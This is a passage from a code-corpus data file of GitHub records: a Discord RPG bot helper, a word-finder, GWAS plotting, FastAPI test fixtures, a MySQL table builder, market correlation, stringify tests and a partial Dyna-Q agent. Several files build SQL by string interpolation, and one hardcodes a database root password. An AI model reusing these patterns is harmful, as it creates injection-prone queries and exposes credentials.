\"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if found == False:\n print(\"Locked. Probably.\")\n for i in range(0,50): # Try only 50 times.\n while True:\n try:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n except ValueError:\n continue\n break\n else:\n chan = message.channel\n user = message.author\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n quest_info = await q_info.fetchone()\n await conn.commit()\n \n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy\n\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n questers.pop(questers.index(new_guy))\n \n end = \"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if silent:\n pass\n else:\n embed = discord.Embed(title=f\"Quest Failed!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_thumbnail(url=quest_info[4])\n await chan.send(content=message.author.mention, embed=embed)\n \n \n\n\n\n###################################################################\n###################################################################\n################## ACHIEVEMENT HANDLING ###########################\n###################################################################\n###################################################################\n\nnecromancer_triggers = [\n \"i want to die\",\n \"i died\",\n \"i am dead\",\n \"i am dying\",\n \"i am going to die\",\n \"i dieded\",\n \"want to be a necromancer\",\n \"wish i was a necromancer\"\n]\n\nold_bot_triggers = [\n \"robo head\",\n \"asami\",\n \"skeletor\",\n \"robo_head\",\n \"runebot\",\n \"rune bot\",\n \"waifu battles\"\n]\n\njanitor_triggers = [\n \"frick\",\n \"heck\",\n \"darn\",\n \"h*ck\",\n]\n\n\nasync def txt_achievement_handler(content, uid, message_obj, bot): # This is going to be a long mess... This is the handler for text-based achievements ONLY! 
\n unlocked = bot.registered_users[str(uid)]\n ach_id = 0\n if any(trg in content for trg in necromancer_triggers) and 1 not in unlocked:\n ach_id = 1\n elif \"@everyone\" in content and 2 not in unlocked:\n ach_id = 2\n elif \"a\" in content and content != f\"{prefix}start\" and 3 not in unlocked:\n ach_id = 3\n elif \"<@!713506775424565370>\" in content or \"<@713506775424565370>\" in content and 4 not in unlocked:\n ach_id = 4\n elif message_obj.guild.id == 732632186204979281 and 5 not in unlocked:\n ach_id = 5\n elif content == \"<@!217288785803608074>\" or content == \"<@217288785803608074>\" and 6 not in unlocked:\n ach_id = 6\n elif any(trg in content for trg in old_bot_triggers) and 7 not in unlocked:\n ach_id = 7\n elif any(trg in content for trg in janitor_triggers) and 8 not in unlocked:\n ach_id = 8\n elif \"no tomb can hold me\" in content and 10 not in unlocked:\n ach_id = 10\n elif \"groovy\" in content and 11 not in unlocked:\n ach_id = 11\n\n # Above determines which achievement has been obtained. Below takes that id and sends the embed as well as awarding the achievement.\n \n if ach_id != 0 and ach_id not in unlocked:\n await award_ach(ach_id, message_obj, bot)\n\n\nasync def add_coolness(uid, amount):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as current_amount:\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n\nasync def add_gold(uid, amount, bot, debt_mode = False, purchase_mode = None, boost_null = False):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}';\") as current_amount:\n gold = await current_amount.fetchone()\n\n if uid in bot.server_boosters and amount > 0 and boost_null == False:\n amount *= 2\n else:\n amount *= 1\n\n final = gold[0]+amount\n if final < 0 and debt_mode == False and purchase_mode == None:\n final = 0\n if final < 0 and purchase_mode != None:\n await purchase_mode.send(\"You cannot afford this!\")\n raise SyntaxError\n await conn.execute(f\"update users set gold = '{final}' where id = '{uid}';\")\n await conn.commit()\n\nasync def award_ach(ach_id, message, bot):\n uid = message.author.id\n unlocked = bot.registered_users[str(uid)]\n if ach_id not in unlocked:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select achievements from users where id = '{uid}';\") as person:\n user_ach = await person.fetchone() # While these lines are repeats from the txt_achievement_handler, this function can be used in other lines of code to award achievements, so this unfortunate redundancy has to stay for now.\n user_ach = user_ach[0].split(\"|\")\n user_ach.append(str(ach_id))\n user_ach = '|'.join(user_ach)\n await conn.execute(f\"update users set achievements = '{user_ach}' where id = '{uid}'\")\n await conn.commit()\n \n async with conn.execute(f\"select * from achievements where id = '{ach_id}'\") as ach:\n ach_info = await ach.fetchone()\n embed = discord.Embed(title=f\"Achievement Unlocked!\", colour=discord.Colour.from_rgb(255,200,0), description=f'**\"{ach_info[1]}\"**\\n*{ach_info[2]}*')\n embed.set_thumbnail(url=ach_info[3])\n amount = ach_info[4]\n embed.set_footer(text=f\"+{amount} Coolness\", icon_url=\"\")\n # await asyncio.sleep(random.randint(30,100))\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as 
current_amount: # Can't run the function for this due to overloading the db\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n async with conn.execute(f\"select id, achievements from users;\") as people:\n usrs = await people.fetchall()\n for guy in usrs: # Regenerate the list of people with achievements.\n user_ach = guy[1].split(\"|\")\n unlocked = []\n for stringnum in user_ach: # Just for the if statement. I really hate this and want to fix it eventually.\n unlocked.append(int(stringnum))\n \n bot.registered_users[guy[0]] = unlocked\n\n mss = await message.channel.send(content=message.author.mention, embed=embed)\n await mss.delete(delay=10)\n \nasync def fetch_random_quest(message, bot, uid=None, override=False):\n # Random quest encounter chance time!\n if uid:\n uid = str(uid.id)\n else:\n uid = str(message.author.id)\n if uid in bot.registered_users:\n chance = random.randint(1,100)\n if override:\n chance = 52\n if chance == 52: \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select currently_questing from users where id = '{uid}';\") as people:\n usrs = await people.fetchall()\n if usrs != []:\n if usrs[0][0] == 0: # If they don't have a quest...\n async with conn.execute(\"select count(*) from quests;\") as numcount:\n num = await numcount.fetchone()\n total_quests = num[0]\n chosen_quest = random.randint(1, total_quests)\n async with conn.execute(f\"select * from quests where quest_id = {chosen_quest}\") as q_info: # Why not select just the users? In case I want to do something with the quest info later. Futureproofing, I suppose.\n quest_info = await q_info.fetchone()\n questers = quest_info[5]\n questers += f\"{uid},0|\"\n await conn.execute(f\"update quests set users = '{questers}' where quest_id = {chosen_quest};\")\n await conn.execute(f\"update users set currently_questing = {chosen_quest} where id = '{uid}';\")\n await conn.commit()\n embed = discord.Embed(title=f\"New Quest!\", colour=discord.Colour.from_rgb(255,200,0), description=f\"**{quest_info[6]}**\\n*{quest_info[1]}*\") \n embed.set_thumbnail(url=quest_info[4])\n embed.set_footer(text=f\"Reward: {quest_info[2].title()} ({quest_info[3]})\", icon_url=\"\")\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=5)\n\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n\nasync def genprof(uid, aps, bot):\n person = uid\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(\"select count(*) from achievements;\") as numcount:\n num = await numcount.fetchone()\n num_not = unobtainable_achs\n total_achievements = num[0]-num_not # Self explanatory.\n async with conn.execute(f\"select * from users where id = '{uid.id}';\") as info:\n user = await info.fetchone()\n\n profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=discord.Colour(0x6eaf0b), description=\"\")\n profile.set_thumbnail(url=uid.avatar_url)\n ###\n user_ach = user[6].split(\"|\")\n user_ach = len(user_ach)-1\n clss = user[1].replace(\"_\",\" \")\n clss = clss.title()\n ###\n profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)}\", icon_url=\"\")\n 
profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n\n # Faction stuff\n if person.id in bot.users_factions.keys():\n faction = bot.users_factions[person.id]\n cog = bot.get_cog('factions')\n if faction in cog.factions.keys():\n fac_info = cog.factions[faction]\n i_rgb = fac_info[6].split(\"|\")\n r = int(i_rgb[0])\n g = int(i_rgb[1])\n b = int(i_rgb[2])\n\n color = discord.Colour.from_rgb(r, g, b)\n profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=color, description=\"\")\n profile.set_thumbnail(url=uid.avatar_url)\n profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)} | Faction: {fac_info[7]}\", icon_url=\"\")\n profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n profile.set_image(url=fac_info[5])\n else:\n pass\n\n\n\n profile.add_field(name=\"Coolness\", value=user[5])\n profile.add_field(name=\"Gold\", value=user[3])\n profile.add_field(name=\"Achievements\", value=f\"{user_ach} of {total_achievements} Unlocked ({int((user_ach/total_achievements)*100)}%)\", inline=False)\n profile.add_field(name=\"Experience\", value=f\"{user[2]} / {max_xp(user[8])} ({int((user[2]/max_xp(user[8]))*100)}%)\", inline=False)\n profile.add_field(name=\"Completed Quests\", value=user[9], inline=False)\n profile.add_field(name=\"Action Points\", value=aps[str(uid.id)], inline=False)\n # profile.add_field(name=) Put equipment here eventually\n \n return(profile)\n\nasync def genrank(uid):\n async with aiosqlite.connect('main.db') as con:\n async with con.execute(f\"select * from users order by coolness desc;\") as lb: # Get their coolness rank!\n stuff = await lb.fetchall()\n rank = 1\n for usr in stuff:\n if usr[0] == str(uid):\n break\n else:\n rank+=1\n return(rank)\n\nasync def get_demon(uid, bot):\n cog = bot.get_cog('pacted')\n users_demons = cog.users_demons\n if uid in users_demons:\n demon = users_demons[uid]\n if demon == \"minehart\" and uid not in cog.minehart:\n cog.minehart[uid] = 0\n else:\n async with aiosqlite.connect('classTables.db') as conn:\n async with conn.execute(f\"select uid, demon from pacted_demons where uid = '{uid}'\") as u_info:\n user_info = await u_info.fetchone()\n if user_info:\n users_demons[uid] = user_info[1]\n cog.users_demons = users_demons\n demon = user_info[1]\n if demon == \"minehart\" and uid not in cog.minehart:\n cog.minehart[uid] = 0\n elif user_info == None:\n demon = None\n return demon","repo_name":"Caldraeus/chat-classes","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":38425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"10308919961","text":"import random\r\nimport pyperclip\r\n\r\nwhile True:\r\n word = input(\"Entrez le mot : \")\r\n print(\"Recherche de mot en cours...\")\r\n\r\n with open(\"D:\\Desktop\\Python_Project\\Jeu De Mot\\ods6.txt\",\"r\") as file:\r\n data = file.readlines()\r\n\r\n correct_word = []\r\n\r\n for i in data:\r\n if word.upper() in i:\r\n correct_word.append(i) \r\n if correct_word == []:\r\n print(\"Votre mot n'est pas dans la liste !\")\r\n \r\n result = random.choice(correct_word) \r\n print(\"\\n Votre mot est : \"+result)\r\n \r\n cop = input(\"Voulez vous copier votre mot ? {O/N} : \")\r\n while cop not in (\"O\",\"N\"):\r\n cop = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if cop == \"O\":\r\n up_lo = input(\"Voulez vous que votre mot soit en miniscule ? {O/N} : \")\r\n while up_lo not in (\"O\",\"N\"):\r\n up_lo = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if up_lo == \"O\":\r\n pyperclip.copy(result.lower())\r\n print(\"Mot copié en miniscule avec succès !\")\r\n elif up_lo == \"N\":\r\n pyperclip.copy(result)\r\n print(\"Mot copié avec succès !\")\r\n \r\n elif cop == \"N\":\r\n pass\r\n \r\n cont = input(\"Voulez vous continuer ? {O/N} : \")\r\n while cont not in (\"O\",\"N\"):\r\n cont = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if cont == \"O\":\r\n continue\r\n if cont == \"N\":\r\n print(\"Bye ! En espérant te revoir prochainement.\")\r\n break","repo_name":"FlenderrAX/PunGenerator","sub_path":"jeu_de_mot.py","file_name":"jeu_de_mot.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"14231478077","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Manhattan & QQ plot\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import gridspec\nfrom scipy.stats.mstats import mquantiles\nfrom scipy.stats import beta\nfrom scipy.stats import linregress\n\n\n# In[2]:\n\n\nsum_stat = '/f/jianhua/nankai-hic/fine-mapping/prostate_cancer.txt'\nchrom, bp, p = 'CHR','BP','P'\nsep = '\\t'\ndf = pd.read_csv(sum_stat,sep=sep)\n\n\n# # Reduce size\n\n# In[19]:\n\n\ndf['CHR'] = df['CHR'].replace('X',23)\ndf['CHR'] = df['CHR'].astype(int)\ndf['P'] = -np.log10(df['P'])\ndf['P_down'] = df['P'].round(1)\ndf['P'] = df['P'].round(3)\ndf['BP_down'] = df['BP']/5e6\ndf['BP_down'] = df['BP_down'].astype(int)\nidx = np.random.permutation(np.arange(len(df)))\ndf = df.iloc[idx].drop_duplicates(['CHR','P_down','BP_down'])\ndf = df.sort_values(['CHR','BP'])\ndf['P'] = 10 ** -df['P']\n\n\n# In[12]:\n\n\ndef qq(data,ax,color):\n xmax = 0\n ymax = 0\n alpha = 0.9\n color = '#000000'\n n_quantiles = 100\n\n q_pos = np.concatenate([\n np.arange(99.) / len(data),\n np.logspace(-np.log10(len(data)) + 2, 0, n_quantiles)\n ])\n\n q_data = mquantiles(data, prob=q_pos, alphap=0, betap=1, limit=(0, 1))\n q_th = q_pos.copy()\n q_err = np.zeros([len(q_pos), 2])\n for i in range(0, len(q_pos)):\n q_err[i, :] = q_err[i, :] = beta.interval(\n alpha,\n len(data) * q_pos[i],\n len(data) - len(data) * q_pos[i])\n\n q_err[i, q_err[i, :] < 0] = 1e-15\n slope, intercept, r_value, p_value, std_err = linregress(q_th, q_data)\n xmax = np.max([xmax, -np.log10(q_th[1])])\n ymax = np.max([ymax, -np.log10(q_data[0])])\n\n ax.plot(\n -np.log10(q_th[n_quantiles - 1:]),\n -np.log10(q_data[n_quantiles - 1:]),\n '-',\n color=color)\n ax.plot(\n -np.log10(q_th[:n_quantiles]),\n -np.log10(q_data[:n_quantiles]),\n '.',\n color=color,\n label='gf')\n ax.plot([0, xmax], [0, xmax], '--k',color='#f42e30')\n ax.fill_between(\n -np.log10(q_th),\n -np.log10(q_err[:, 0]),\n -np.log10(q_err[:, 1]),\n color=color,\n alpha=0.1,\n )\n\n\n# In[16]:\n\n\ndef manhattan(df,ax):\n df[p] = -np.log10(df[p])\n df = df.sort_values(chrom)\n df_grouped = df.groupby((chrom))\n\n colors = ['#1A1A1A','#999999',]\n x_labels = []\n x_labels_pos = []\n end = 1000\n for num, (name, group) in enumerate(df_grouped):\n group[bp] = group[bp] + end\n end = group[bp].max() + 1000\n ax.scatter(group[bp], group[p],c=colors[num % len(colors)],s=1)\n x_labels.append(name)\n x_labels_pos.append(group[bp].mean())\n ax.axhline(y=-np.log10(5e-8), color='#2222FF', linestyle='-')\n ax.set_xticks(x_labels_pos)\n ax.set_xticklabels(x_labels)\n# print(df.loc[0,bp]-len(df)*0.1,end+len(df)*0.1)\n# ax.set_ylim([-0.5, df[p].max()*1.05])\n\n\n# In[20]:\n\n\n# df = alldf.copy()\nfigure_tile = 'PH-277'\nfig = plt.figure(figsize=(24, 6))\ngs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])\nax0 = plt.subplot(gs[0])\nax1 = plt.subplot(gs[1])\nqq(df[p], ax1, 'b')\nmanhattan(df,ax0)\n# ax0.set_xlim(left=-3e7,right=2.9e9)\nax0.set_xlabel('Chromosome', fontsize=14)\nax0.set_ylabel('-$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_xlabel('Observed -$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_ylabel('Expected -$\\mathregular{log_{10}}$P', fontsize=14)\nax0.spines['right'].set_visible(False)\nax0.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.spines['top'].set_visible(False)\nfig.suptitle(figure_tile, 
fontsize=20)\nfig.tight_layout()\nfig.savefig('{}_Manhattan_QQ.pdf'.format(figure_tile), dpi=300)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Jianhua-Wang/sci_viz_py","sub_path":"notebook/_build/jupyter_execute/docs/manhattan_qq.py","file_name":"manhattan_qq.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"74208845219","text":"from typing import Generator, Iterator\n\nfrom fastapi.testclient import TestClient\nimport pytest\nfrom sqlalchemy.orm import Session\n\nfrom app import main\nfrom app.database.models import Base, User\nfrom app.routers import (\n agenda, event, friendview, google_connect, invitation, profile\n)\nfrom app.routers.salary import routes as salary\nfrom tests import security_testing_routes\nfrom tests.conftest import get_test_db, test_engine\n\nmain.app.include_router(security_testing_routes.router)\n\n\ndef get_test_placeholder_user() -> User:\n return User(\n username='fake_user',\n email='fake@mail.fake',\n password='123456fake',\n full_name='FakeName',\n language_id=1,\n telegram_id='666666',\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef client() -> TestClient:\n return TestClient(main.app)\n\n\ndef create_test_client(get_db_function) -> Generator[Session, None, None]:\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[get_db_function] = get_test_db\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef agenda_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(agenda.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef friendview_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(friendview.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef event_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef home_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(main.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef invitation_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(invitation.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef profile_test_client() -> Generator[Session, None, None]:\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[profile.get_db] = get_test_db\n main.app.dependency_overrides[\n profile.get_placeholder_user] = get_test_placeholder_user\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef security_test_client():\n yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef salary_test_client() -> Iterator[TestClient]:\n yield from create_test_client(salary.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef google_connect_test_client():\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[google_connect.get_db] = get_test_db\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n","repo_name":"PythonFreeCourse/calendar","sub_path":"tests/client_fixture.py","file_name":"client_fixture.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"35"}
+{"seq_id":"12619541274","text":"# @author Duke Chain\n# @File:CreateStockInfo.py\n# @createTime 2020/11/05 22:54:05\n\nimport pymysql\n\n\nclass CreateStockInfo:\n \"\"\"\n 为新收集的数据在stock_info数据库中创建表\n 表命名规则:stockID\n\n Args:\n stockID:传入股票ID\n database:目标位于的数据库(daily,weekly,monthly)\n content:判断数据库类型(d(日),t(秒),m(分钟))\n \"\"\"\n\n def __init__(self, stockID, database, content='m'):\n self.stockID = stockID\n self.database = database\n self.content = content\n\n def _connection(self):\n \"\"\"\n 建立和数据库的连接\n \"\"\"\n conn = pymysql.connect(\"localhost\", \"root\", \"qian258046\", self.database, charset='utf8')\n cursor = conn.cursor()\n return cursor, conn\n\n def createTable(self):\n \"\"\"\n 为stockID创建表\n ts_code trade_date open high low close pre_close chg pct_chg vol amount\n\n Returns:\n 建表成功返回Ture,失败返回False\n \"\"\"\n cursor, conn = self._connection()\n existence = cursor.execute(\"show tables like '%s';\" % self.stockID)\n # 检查该表是否已经存在\n if existence == 1:\n print('该表已存在,不予重复创建')\n return False\n else:\n # 日���数据表\n if self.content == 'd':\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n close_price float,\n high_price float,\n low_price float,\n open_price float,\n pre_close float,\n volume float,\n outstanding_share float,\n turnover float\n )\"\"\".format(self.stockID)\n # 秒级数据表\n elif self.content == 't':\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n stock_price float,\n chg float,\n volume float\n )\"\"\".format(self.stockID)\n # 分钟级数据表\n else:\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n open_price float,\n high_price float,\n low_price float,\n close_price float,\n volume float\n )\"\"\".format(self.stockID)\n cursor.execute(sql)\n print(self.stockID + \"信息表已创建!\")\n conn.commit()\n conn.close()\n\n return True\n\n# 测试信息\n# test = CreateStockInfo('test_table')\n# test.createTable()\n","repo_name":"dukechain2333/BossaNova","sub_path":"DBOperate/CreateStockInfo.py","file_name":"CreateStockInfo.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"29104988390","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport matplotlib.dates as mdates\n\n\n#1/1/07 till now monthly (per gram?)\n\ngold = pd.read_csv(\"Gold.csv\")\nbrent = pd.read_csv(\"brent-month_csv.csv\")\ndollar = pd.read_csv(\"USDX.csv\")\ndates = mdates.num2date(mdates.datestr2num(gold['date']))\nGold = gold['price']\nBrent = brent['Brent Spot Price']\nDollar = dollar['Price']\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Gold, 'y')\nax1.set_ylabel('Gold (yellow)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Gold, 'y')\nax2.set_ylabel('Gold (yellow)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nGoldBrent07_12 = np.corrcoef(Gold[0:84],Brent[0:84]) #From 07 to 12\nGoldBrent15_18 = np.corrcoef(Gold[96:],Brent[96:]) #From 15 to 18\n\nprint('GoldBrent07_12', GoldBrent07_12[0][1])\nprint('GoldBrent15_18', GoldBrent15_18[0][1])\nprint('overall GoldBrent', np.corrcoef(Gold,Brent)[0][1])\n\nDollarBrent09_15 = np.corrcoef(Dollar[43:115],Brent[24:96])\nDollarBrent15_18 = np.corrcoef(Dollar[0:43],Brent[96:-1]) \n# Dollar has one month less than Brent (dimension error) so use -1\nprint('DollarBrent09_15', DollarBrent09_15[0][1])\nprint('DollarBrent15_18', DollarBrent15_18[0][1])\nprint('overall GoldBrent', np.corrcoef(Dollar,Brent)[0][1])","repo_name":"shervinrad100/Python-Projects","sub_path":"Hobby/Gold, Dollar, Oil/oilvGold.py","file_name":"oilvGold.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"25359348993","text":"import os\n\nimport pytest\n\nfrom stringify.stringify import stringify\n\n# Вернуть полный путь к файлу в директории fixtures\ndef get_fixture_path(file_name):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n return os.path.join(current_dir, 'fixtures', file_name)\n\n# Прочитать файл по указанному пути\ndef read(file_path):\n with open(file_path, 'r') as f:\n result = f.read()\n return result\n\n# Создаем несколько тестовых значений примитивных типов \n# данных для проверки функции stringify()\nprimitives = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n}\n\n# Создаем сложную вложенную структуру данных \n# для проверки функции stringify()\nnested = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n \"dict\": {\n 5: \"number\",\n None: \"None\",\n True: \"boolean\",\n \"value\": \"string\",\n \"nested\": {\n \"boolean\": True,\n \"string\": 'value',\n \"number\": 5,\n None: \"None\",\n },\n },\n}\n\n# Создаем список тестовых случаев для проверки функции stringify()\n# Каждый случай содержит три параметра: заменитель (replacer), \n# количество пробелов (spases_count) и индекс \n# соответствующей строки в файлах plain.txt и nested.txt\ncases = [\n ('|-', 1, 0), # первый уровень вложенности, 1 пробел\n ('|-', 2, 1), # второй уровень вложенности, 2 пробела\n (' ', 3, 2), # третий уровень вложенности, 3 пробела\n]\n\n# Тест функции stringify() на примитивных типах данных\n# Проверяем, что функция правильно преобразует строку, \n# логическое значение и число в строку\n@pytest.mark.parametrize(\"value\", primitives.values())\ndef test_primitives(value):\n \n assert stringify(value) == str(value)\n\nplain_data = read(get_fixture_path('plain.txt')).rstrip().split('\\n\\n\\n')\nnested_data = read(get_fixture_path('nested.txt')).rstrip().split('\\n\\n\\n')\n\n# Тест функции stringify() на сложной вложенной структуре данных\n# Проверяем, что функция правильно преобразует словарь с вложенными словарями и списками в строку с заданным \n# количеством пробелов и заменителями\n@pytest.mark.parametrize(\"replacer,spases_count,case_index\", cases)\ndef test_nested(replacer, spases_count, case_index):\n expected = nested_data[case_index]\n assert stringify(nested, replacer, spases_count) == expected\n\n# Тест функции stringify() на примитивных типах данных\n# Проверяем, что функция правильно преобразует словарь с примитивными типами данных в строку с заданным \n# количеством пробелов и заменителями\n@pytest.mark.parametrize(\"replacer,spases_count,case_index\", cases)\ndef test_plain(replacer, spases_count, case_index):\n expected = plain_data[case_index]\n assert stringify(primitives, replacer, spases_count) == expected\n\n\ndef test_default_values():\n assert stringify(primitives) == plain_data[3]\n assert stringify(primitives, ' ') == plain_data[3]\n assert stringify(primitives, '...') == plain_data[4]\n assert stringify(nested) == nested_data[3]\n assert stringify(nested, ' ') == nested_data[3]\n assert stringify(nested, '...') == nested_data[4]\n","repo_name":"AlexanderLarriva/Stringify","sub_path":"tests/test_stringify.py","file_name":"test_stringify.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"28919418648","text":"#Mateo Guaman Castro\n#Homework 3\n#Tufts University\n#Comp 150: Reinforcement Learning\n#Exercise 8.4: Dyna-Q+\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass Environment:\n def __init__(self):\n self.maze = self.generate_maze()\n def generate_maze(self):\n maze = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 100],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0 ,0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 500, 1, 1, 1, 1, 1]])\n return maze\n\n\nclass Agent:\n def __init__(self, maze, epsilon, gamma, alpha, kappa, n):\n #Initialize maze\n self.maze = maze\n print(\"Initial maze\")\n #Initialize action space A\n self.act = [-1, 0, 1]\n self.A = [(1,0), (-1, 0), (0, 1), (0, -1)]\n #Initialize state space S\n self.row_pos = [i for i in range(self.maze.shape[0])]\n self.col_pos = [i for i in range(self.maze.shape[1])]\n\n self.S = list(((x,y) for x in self.row_pos for y in self.col_pos))\n\n #Array to keep track of previously selected states and actions\n self.previously_selected = np.zeros((len(self.S), len(self.A)))\n self.Q, self.Model = self.initialize_Q_Model(self.S, self.A)\n self.lastVisited = np.zeros((len(self.S), len(self.A)))\n self.epsilon = epsilon\n self.gamma = gamma\n self.alpha = alpha\n self.kappa = kappa\n self.n = n\n\n def initialize_Q_Model(self, state_space, action_space):\n '''\n Initializes Q(s, a) anc C(s, a) where s in Z^4 and a in Z^2\n Input:\n State space as list of (row_pos, col_pos, row_vel, col_vel)\n Action space as list of (row_delta, col_delta)\n Returns:\n Dictionary Q with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value radnom number from normal distribution\n Dictionary Model with key ((row_pos, col_pos, row_vel, col_vel), (row_delta, col_delta)) and value [0,0] where the elements are [Reward, New_state]\n '''\n state_action_tuples = tuple((x, y) for x in state_space for y in action_space)\n Q = {l:np.random.normal(0,1) for l in state_action_tuples}\n Model = {l:[0, 0] for l in state_action_tuples}\n return Q, Model\n\n\n def argmax(self, state):\n '''\n Finds the argmax_a and max_a for a given state. Used for Dyna-Q and Dyna-Q+ with bonus on the reward\n Input:\n State as a tuple 